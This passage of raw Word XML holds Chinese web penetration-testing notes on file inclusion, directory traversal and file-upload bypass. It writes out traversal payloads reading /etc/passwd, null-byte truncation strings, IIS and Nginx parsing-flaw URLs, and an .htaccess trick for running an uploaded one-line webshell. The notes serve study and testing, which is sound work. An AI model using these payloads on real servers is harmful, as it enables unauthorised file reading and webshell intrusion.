              <w:t>local</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="CCCCCC"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/app/apache2/conf/http.conf</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="648AE033" w14:textId="77777777" w:rsidR="00D54804" w:rsidRDefault="00D54804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</w:p>
          <w:p w14:paraId="3EC7DF7E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/usr/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="builtin"/>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="F99157"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>local</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="CCCCCC"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/app/php5/lib/php.ini          PHP</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="CCCCCC"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>相关设置</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14D5ABE2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/etc/httpd/conf/http.conf                    apache</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="CCCCCC"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>配置文件</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="642FBF09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/etc/my.cnf                                              mysql</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="CCCCCC"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>配置文件</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7A2549F9" w14:textId="77777777" w:rsidR="00BC34FC" w:rsidRDefault="00BC34FC" w:rsidP="00BC34FC">
      <w:pPr>
        <w:pStyle w:val="a3"/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可以尝试访问</w:t>
      </w:r>
      <w:hyperlink r:id="rId150" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
            <w:i/>
            <w:iCs/>
            <w:color w:val="0593D3"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>http://www.xxx.com/1.jpg%00</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0393C5A1" w14:textId="77777777" w:rsidR="00BC34FC" w:rsidRDefault="00BC34FC" w:rsidP="00BC34FC">
      <w:pPr>
        <w:pStyle w:val="a3"/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（二）使用长目录截断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5169"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC34FC" w14:paraId="2AD78EE4" w14:textId="77777777" w:rsidTr="00BC3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161D1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1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50E26ED5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2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19C2CE67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3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="617503E8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4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6123C7DA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6D79A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././././././././././././././etc/passwd</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="657A0DE1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或者</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16734FE6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////////////////////////////etc/passwd</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60CCF841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或者</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="325CBD51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../a/etc/passwd/../a/etc/passwd/../a/etc/passwd</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2A9178BA" w14:textId="77777777" w:rsidR="00BC34FC" w:rsidRPr="00BC34FC" w:rsidRDefault="00BC34FC" w:rsidP="00BC34FC"/>
    <w:p w14:paraId="29D13E61" w14:textId="77777777" w:rsidR="00FA7087" w:rsidRDefault="00BB3AB0" w:rsidP="006B3FE4">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a4"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId151" w:history="1">
        <w:r w:rsidR="00126765" w:rsidRPr="00971B05">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>https://bbs.ichunqiu.com/thread-54849-1-1.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5B52DBAA" w14:textId="77777777" w:rsidR="00702405" w:rsidRPr="00702405" w:rsidRDefault="00BB3AB0" w:rsidP="006B3FE4">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId152" w:history="1">
        <w:r w:rsidR="00702405">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://blog.51cto.com/wt7315/1863177</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="14C1ED17" w14:textId="77777777" w:rsidR="00126765" w:rsidRDefault="00BB3AB0" w:rsidP="006B3FE4">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a4"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId153" w:history="1">
        <w:r w:rsidR="00702405">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://www.k0rz3n.com/2018/11/20/%E4%B8%80%E7%AF%87%E6%96%87%E7%AB%A0%E5%B8%A6%E4%BD%A0%E7%90%86%E8%A7%A3%E6%BC%8F%E6%B4%9E%E4%B9%8B%20PHP%20%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6EB14725" w14:textId="4999399B" w:rsidR="00BC34FC" w:rsidRDefault="00BB3AB0" w:rsidP="006B3FE4">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId154" w:history="1">
        <w:r w:rsidR="00050AA0">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://mp.weixin.qq.com/s/VMnU-PttVurV-bswtDd0xg</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="220354B3" w14:textId="77777777" w:rsidR="00BC34FC" w:rsidRDefault="00BC34FC" w:rsidP="006B3FE4">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74D50D0C" w14:textId="77777777" w:rsidR="00BC34FC" w:rsidRPr="00BC34FC" w:rsidRDefault="00BC34FC" w:rsidP="006B3FE4">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C628424" w14:textId="77777777" w:rsidR="00982F28" w:rsidRDefault="00982F28" w:rsidP="00982F28">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录遍历</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A741971" w14:textId="77777777" w:rsidR="00982F28" w:rsidRDefault="00982F28" w:rsidP="00982F28">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>几种经典的测试方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3300DF04" w14:textId="77777777" w:rsidR="00982F28" w:rsidRDefault="00982F28" w:rsidP="00982F28"/>
    <w:p w14:paraId="4378638F" w14:textId="77777777" w:rsidR="00982F28" w:rsidRDefault="00982F28" w:rsidP="00982F28">
      <w:r>
        <w:t>?file=../../../../../etc/passwdd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C904D3F" w14:textId="77777777" w:rsidR="00982F28" w:rsidRDefault="00982F28" w:rsidP="00982F28"/>
    <w:p w14:paraId="46F06418" w14:textId="77777777" w:rsidR="00982F28" w:rsidRDefault="00982F28" w:rsidP="00982F28">
      <w:r>
        <w:t>?page=file:///etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3CD074" w14:textId="77777777" w:rsidR="00982F28" w:rsidRDefault="00982F28" w:rsidP="00982F28"/>
    <w:p w14:paraId="2B159C8D" w14:textId="77777777" w:rsidR="00982F28" w:rsidRDefault="00982F28" w:rsidP="00982F28">
      <w:r>
        <w:t>?home=main.cgi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77239FB7" w14:textId="77777777" w:rsidR="00982F28" w:rsidRDefault="00982F28" w:rsidP="00982F28"/>
    <w:p w14:paraId="2CB32F29" w14:textId="77777777" w:rsidR="00982F28" w:rsidRDefault="00982F28" w:rsidP="00982F28">
      <w:r>
        <w:t>?page=http://www.a.com/1.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7124FF26" w14:textId="77777777" w:rsidR="00982F28" w:rsidRDefault="00982F28" w:rsidP="00982F28"/>
    <w:p w14:paraId="335D4B0B" w14:textId="77777777" w:rsidR="00982F28" w:rsidRDefault="00BB3AB0" w:rsidP="00982F28">
      <w:hyperlink r:id="rId155" w:history="1">
        <w:r w:rsidR="00982F28" w:rsidRPr="00335348">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>http://1.1.1.1/../../../../dir/file.txt</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1D14B0C0" w14:textId="77777777" w:rsidR="00982F28" w:rsidRPr="00982F28" w:rsidRDefault="00982F28" w:rsidP="00982F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2F28">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>%00嵌入任意位置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCD81BA" w14:textId="77777777" w:rsidR="00982F28" w:rsidRPr="00982F28" w:rsidRDefault="00982F28" w:rsidP="00982F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2F28">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.的利用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF69D75" w14:textId="77777777" w:rsidR="00982F28" w:rsidRPr="00982F28" w:rsidRDefault="00982F28" w:rsidP="00982F28"/>
    <w:p w14:paraId="03033FAA" w14:textId="77777777" w:rsidR="007F7103" w:rsidRDefault="007F7103" w:rsidP="007F7103">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件上传绕过</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EAE0C0A" w14:textId="77777777" w:rsidR="009D12C4" w:rsidRDefault="00BB3AB0" w:rsidP="009D12C4">
      <w:hyperlink r:id="rId156" w:history="1">
        <w:r w:rsidR="009D12C4" w:rsidRPr="007C08CC">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://freeerror.org/d/461</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="009D12C4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009D12C4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>很全！</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6610A6B6" w14:textId="77777777" w:rsidR="009D12C4" w:rsidRPr="009D12C4" w:rsidRDefault="009D12C4" w:rsidP="009D12C4"/>
    <w:p w14:paraId="27D8851C" w14:textId="77777777" w:rsidR="00B43685" w:rsidRDefault="00BB3AB0" w:rsidP="00B43685">
      <w:hyperlink r:id="rId157" w:anchor="%E4%B8%80%E4%B8%AA%E5%8D%97%E9%82%AE%E7%9A%84CTF%E9%A2%98%E2%80%94%E4%B8%8A%E4%BC%A0%E7%BB%95%E8%BF%87" w:history="1">
        <w:r w:rsidR="00B43685">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>http://j0k3r.top/2018/01/30/file-upload/#%E4%B8%80%E4%B8%AA%E5%8D%97%E9%82%AE%E7%9A%84CTF%E9%A2%98%E2%80%94%E4%B8%8A%E4%BC%A0%E7%BB%95%E8%BF%87</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00B43685">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00B43685">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件包含文件上传的简单总结</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387759B7" w14:textId="77777777" w:rsidR="00B43685" w:rsidRPr="00B43685" w:rsidRDefault="00B43685" w:rsidP="00B43685"/>
    <w:p w14:paraId="55B99373" w14:textId="77777777" w:rsidR="00367951" w:rsidRPr="00367951" w:rsidRDefault="00BB3AB0" w:rsidP="00367951">
      <w:hyperlink r:id="rId158" w:history="1">
        <w:r w:rsidR="00367951" w:rsidRPr="00076615">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://www.freebuf.com/articles/web/188464.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00367951">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00367951">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件上传fuzzy构造</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5A980A" w14:textId="77777777" w:rsidR="00702405" w:rsidRPr="00702405" w:rsidRDefault="00BB3AB0" w:rsidP="00702405">
      <w:hyperlink r:id="rId159" w:history="1">
        <w:r w:rsidR="00702405">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://blog.51cto.com/wt7315/1865580</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6D879BBC" w14:textId="77777777" w:rsidR="007F7103" w:rsidRDefault="007F7103" w:rsidP="007F7103">
      <w:r>
        <w:t>.文件名大小写绕过：pHp，AsP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066E6EEA" w14:textId="7752900A" w:rsidR="007F7103" w:rsidRDefault="006B2F26" w:rsidP="007F7103">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后缀添加空格</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A1C4F9" w14:textId="77777777" w:rsidR="007F7103" w:rsidRDefault="007F7103" w:rsidP="007F7103">
      <w:r>
        <w:t>2.特殊文件名绕过</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0E669D" w14:textId="77777777" w:rsidR="007F7103" w:rsidRDefault="007F7103" w:rsidP="007F7103">
      <w:r>
        <w:t xml:space="preserve">  在Windows下有一个特性就是如果文件后缀以点‘.’或者空格‘ ’结尾的后缀 名时，系统在保存文件时会自动去除点和空格。但要注意 Unix/Linux 系统没有 这个特性。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55836CED" w14:textId="77777777" w:rsidR="007F7103" w:rsidRDefault="007F7103" w:rsidP="007F7103">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>因为有些服务器端的后缀名检测是取文件名最后一个</w:t>
      </w:r>
      <w:r>
        <w:t>.后面的字符串，拿这个字符串与黑名单列表对比</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF69C69" w14:textId="77777777" w:rsidR="007F7103" w:rsidRDefault="007F7103" w:rsidP="007F7103"/>
    <w:p w14:paraId="68DB3997" w14:textId="77777777" w:rsidR="007F7103" w:rsidRDefault="007F7103" w:rsidP="007F7103">
      <w:r>
        <w:t>3. 0x00截断绕过</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3D40B4" w14:textId="77777777" w:rsidR="007F7103" w:rsidRDefault="007F7103" w:rsidP="007F7103">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件名后缀有一个</w:t>
      </w:r>
      <w:r>
        <w:t>%00字节，可以截断某些函数对文件名的判断。在许多语言函 数中，处理字符串的函数中0x00被认为是终止符</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E813FA" w14:textId="77777777" w:rsidR="007F7103" w:rsidRDefault="007F7103" w:rsidP="007F7103">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例如</w:t>
      </w:r>
      <w:r>
        <w:t>: 网站上传函数处理xxx.asp%00.jpg时，首先后缀名是合法的jpg格式，可以 上传，在保存文件时，遇到%00字符丢弃后面的 .jpg，文件后缀最终保存的后缀 名为xxx.asp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F534ECF" w14:textId="77777777" w:rsidR="005C3B9B" w:rsidRDefault="005C3B9B" w:rsidP="007F7103"/>
    <w:p w14:paraId="6A03581A" w14:textId="77777777" w:rsidR="005C3B9B" w:rsidRDefault="005C3B9B" w:rsidP="005C3B9B">
      <w:r>
        <w:t>IS6.0有两个解析漏洞，一个是如果目录名包.asp 、.asa、.cer字符串，那么这个目录下所有的文 件都会按照 asp 去解析。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D57D5DC" w14:textId="77777777" w:rsidR="005C3B9B" w:rsidRDefault="005C3B9B" w:rsidP="005C3B9B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例如：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> chaoasp/1.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB4086D" w14:textId="77777777" w:rsidR="005C3B9B" w:rsidRDefault="005C3B9B" w:rsidP="005C3B9B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因为文件名中有</w:t>
      </w:r>
      <w:r>
        <w:t>asp字样，所以该文件夹下的1.jpg文件打开时，会按照asp文件去解析执行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB41D96" w14:textId="77777777" w:rsidR="005C3B9B" w:rsidRDefault="005C3B9B" w:rsidP="005C3B9B"/>
    <w:p w14:paraId="2EDFAAC2" w14:textId="77777777" w:rsidR="005C3B9B" w:rsidRDefault="005C3B9B" w:rsidP="005C3B9B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>另一个是只要文件名中含有</w:t>
      </w:r>
      <w:r>
        <w:t>.asp、.asa、.cer会优先按 asp 来解析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A68ED8" w14:textId="77777777" w:rsidR="005C3B9B" w:rsidRDefault="005C3B9B" w:rsidP="005C3B9B"/>
    <w:p w14:paraId="71C2E169" w14:textId="77777777" w:rsidR="005C3B9B" w:rsidRDefault="005C3B9B" w:rsidP="005C3B9B">
      <w:r>
        <w:t>IIS7.0/7.5是对php解析时有一个类似于Nginx的解析漏洞， 对任意文件名只要在URL后面追加 上字符串“/任意文件名.php”就会按照 php 的方式去解析 。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4E7D64" w14:textId="77777777" w:rsidR="005C3B9B" w:rsidRDefault="005C3B9B" w:rsidP="005C3B9B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例子</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ：  ”http://www.baidu.com/upload/chao/1.jpg/chao.php"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2D5618" w14:textId="77777777" w:rsidR="005C3B9B" w:rsidRDefault="005C3B9B" w:rsidP="005C3B9B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种情况下访问</w:t>
      </w:r>
      <w:r>
        <w:t>1.jpg，该文件就会按照php格式被解析执行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484CBEB8" w14:textId="77777777" w:rsidR="005C3B9B" w:rsidRDefault="005C3B9B" w:rsidP="005C3B9B"/>
    <w:p w14:paraId="433D772E" w14:textId="77777777" w:rsidR="005C3B9B" w:rsidRDefault="005C3B9B" w:rsidP="005C3B9B">
      <w:r>
        <w:t>3.Nginx解析漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2811ED7D" w14:textId="77777777" w:rsidR="005C3B9B" w:rsidRDefault="005C3B9B" w:rsidP="005C3B9B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一个是对任意文件名，在后面添加</w:t>
      </w:r>
      <w:r>
        <w:t>/任意文件名.php的解析漏洞，比如原本文件名是 test.jpg， 可以添加为 test.jpg/x.php 进行解析攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D09CB7" w14:textId="77777777" w:rsidR="005C3B9B" w:rsidRDefault="005C3B9B" w:rsidP="005C3B9B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一种是对低版本的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Nginx 可以在任意文件名后面添加%00.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2818FD30" w14:textId="77777777" w:rsidR="005C3B9B" w:rsidRDefault="005C3B9B" w:rsidP="005C3B9B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>例如：</w:t>
      </w:r>
      <w:r>
        <w:t>127.0.0.1/sql-loads/load/chao.jpg%00.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B5D2B5" w14:textId="77777777" w:rsidR="005C3B9B" w:rsidRDefault="005C3B9B" w:rsidP="005C3B9B">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>那么</w:t>
      </w:r>
      <w:r>
        <w:t>chao.jpg也就被当作php格式文件执行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17615368" w14:textId="77777777" w:rsidR="007F7103" w:rsidRDefault="00BB3AB0" w:rsidP="007F7103">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a4"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId160" w:history="1">
        <w:r w:rsidR="007F7103">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://paper.seebug.org/219/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0BC9749B" w14:textId="77777777" w:rsidR="00BC3FCD" w:rsidRDefault="00BC3FCD" w:rsidP="007F7103">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a4"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A8B1E26" w14:textId="77777777" w:rsidR="00BC3FCD" w:rsidRDefault="00BC3FCD" w:rsidP="00BC3FCD">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>.htaccess攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5610685A" w14:textId="77777777" w:rsidR="00BC3FCD" w:rsidRDefault="00BC3FCD" w:rsidP="00BC3FCD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>建一个.htaccess 文件，里面的内容如下：</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>&lt;FilesMatch "pino"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>SetHandler application/x-httpd-php</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>&lt;/FilesMatch&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8028A6" w14:textId="409BE35E" w:rsidR="00BC3FCD" w:rsidRDefault="00BC3FCD" w:rsidP="00BC3FCD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>这个时候就上传一个文件名字是pino，这个时候我们上传一个文件名字叫做pino的文件，不要后缀名，然后里面是一句话木马，用菜刀连接，可以成功！</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376E70CE" w14:textId="77777777" w:rsidR="0028032E" w:rsidRDefault="0028032E" w:rsidP="00BC3FCD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DB99ED4" w14:textId="0916893F" w:rsidR="00F7051C" w:rsidRDefault="00F7051C" w:rsidP="00BC3FCD">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>渲染绕过</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F75F1FD" w14:textId="766E4E53" w:rsidR="00F7051C" w:rsidRDefault="00BB3AB0" w:rsidP="00BC3FCD">
      <w:hyperlink r:id="rId161" w:history="1">
        <w:r w:rsidR="00F7051C" w:rsidRPr="003B772F">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://xz.aliyun.com/t/2657</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4AB227A6" w14:textId="350F1A6F" w:rsidR="00BC3FCD" w:rsidRPr="00F3602C" w:rsidRDefault="00BC3FCD" w:rsidP="00BC3FCD">
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA7EE5C" w14:textId="77777777" w:rsidR="00BC3FCD" w:rsidRPr="00BC3FCD" w:rsidRDefault="00BC3FCD" w:rsidP="007F7103"/>
    <w:p w14:paraId="58701E34" w14:textId="77777777" w:rsidR="00126765" w:rsidRDefault="00126765" w:rsidP="00126765">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编辑器漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6043A879" w14:textId="77777777" w:rsidR="002A3401" w:rsidRPr="002A3401" w:rsidRDefault="002A3401" w:rsidP="002A3401">
      <w:r w:rsidRPr="002110F6">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>https://bbs.ichunqiu.com/forum.php?mod=viewthread&amp;tid=6419&amp;highlight=%E7%BC%96%E8</w:t>
      </w:r>
      <w:r w:rsidRPr="002A3401">
        <w:t>%BE%91%E5%99%A8%E6%BC%8F%E6%B4%9E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593B8B8" wp14:editId="5F222523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274310" cy="2154555"/>
            <wp:effectExtent l="0" t="0" r="254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32644" w14:textId="77777777" w:rsidR="002A3401" w:rsidRPr="002A3401" w:rsidRDefault="007A3227" w:rsidP="002A3401">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251673600" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3BF795B1" wp14:editId="2436894F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>2495550</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5274310" cy="3646170"/>
            <wp:effectExtent l="0" t="0" r="254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FBF4A" w14:textId="77777777" w:rsidR="00126765" w:rsidRDefault="00126765" w:rsidP="00126765"/>
    <w:p w14:paraId="355A69C0" w14:textId="77777777" w:rsidR="007A3227" w:rsidRDefault="007A3227" w:rsidP="00126765"/>
    <w:p w14:paraId="6897CBEE" w14:textId="77777777" w:rsidR="007A3227" w:rsidRDefault="007A3227" w:rsidP="00126765"/>
    <w:p w14:paraId="227759DB" w14:textId="77777777" w:rsidR="007A3227" w:rsidRDefault="007A3227" w:rsidP="00126765"/>
    <w:p w14:paraId="57BEEBB7" w14:textId="77777777" w:rsidR="007A3227" w:rsidRDefault="007A3227" w:rsidP="00126765"/>
    <w:p w14:paraId="5265BE6B" w14:textId="77777777" w:rsidR="007A3227" w:rsidRDefault="007A3227" w:rsidP="00126765"/>
    <w:p w14:paraId="24470124" w14:textId="77777777" w:rsidR="007A3227" w:rsidRDefault="007A3227" w:rsidP="00126765"/>
    <w:p w14:paraId="530375A1" w14:textId="77777777" w:rsidR="007A3227" w:rsidRDefault="007A3227" w:rsidP="00126765"/>
